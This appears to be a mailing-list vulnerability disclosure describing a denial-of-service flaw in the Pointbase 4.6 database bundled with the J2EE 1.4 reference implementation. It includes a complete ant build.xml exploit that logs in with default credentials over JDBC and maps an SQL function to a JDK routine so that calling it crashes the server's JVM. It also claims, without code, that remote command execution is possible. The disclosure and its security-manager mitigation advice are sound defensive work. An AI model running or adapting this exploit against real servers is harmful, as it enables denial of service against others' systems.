Hi, the following code crashes the Pointbase 4.6 database that comes with the J2EE reference implementation. It is provided as an ant script for flexibility and to illustrate the involved ressources. This is a cross-platform denial-of-service java exploit, caused by fact that the pointbase installation coming with j2ee/ri 1.4. is not equipped with an appropriate security manager, thus giving all jars implicitly all permissions. These unlimited permissions can be exploited by an attacker using jdbc to crash the jvm running the pointbase server. Unfortunately there is no policy file provided by Sun defining the necessary permissions for pointbase, leaving the application server deployer alone in the rain. And it is a long, time-consuming job figuring out the permissions when starting with a zero-permissions policy-file. A recommended approach to find out the necessary permissions of an application tailored to the use case is test-driving the application with jchains (www.jchains.org) and using this tool to record the needed permissions in a permission template. After fine-tuning the recorded permissions and starting the application with a security manager that is configured with these permissions the applications runs in a confined "sandbox" mode, which prevents attackers from access vulnerable jdk routines like sun.misc.MessageUtils.toStderr. Further exploitations possible are information disclosure and remote command injection (tested on java/winxp and java/linux where I was able to start a notepad.exe (win) or xemacs (linux)) on the pointbase server via a jdbc command). Further details on these vulnerabilities and which major JDBC database are vulnerable (it is not only pointbase having this bug, you may remember the jboss vulnerability in 9/2003) can be read in an upcoming report by illegalaccess.org. If interested in more details you can contact me. (marc[at]marc-schoenefeld.com) Also send me an email to get a policy file tailored to the pointbase installation of j2ee14ri. Also feel free to download the jChains tool and send me your suggestions and further thoughts about it. jChains is free to use for educational purposes only, so you need to ask me for restrictions for any commercial usage. Cheers Marc Schoenefeld (marc[at]illegalaccess.org) ======================build.xml======================= .(.!-- pointbase denial-of-service by marc schoenefeld --".). .(.project default="dos".). .(.property name="host" value="192.168.0.7"/.). .(.target name="dos".). .(.sql driver="com.pointbase.jdbc.jdbcUniversalDriver" url="jdbc:pointbase://${host}:9092/sample" userid="pbpublic" password="pbpublic" print="true" .). .(.![CDATA[ //DROP FUNCTION CRASH5(VARCHAR(20)); CREATE FUNCTION CRASH5(IN P1 VARCHAR(20)) RETURNS VARCHAR(20) LANGUAGE JAVA NO SQL EXTERNAL NAME "sun.misc.MessageUtils::toStderr" PARAMETER STYLE SQL; SELECT CRASH5(null) from SYSUSERS; ]].). .(.classpath.). .(.pathelement location="pbclient.jar"/.). .(./classpath.). .(./sql.). .(./target.). .(./project.). ======================build.xml======================= -- Never be afraid to try something new. Remember, amateurs built the ark; professionals built the Titanic. -- Anonymous Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer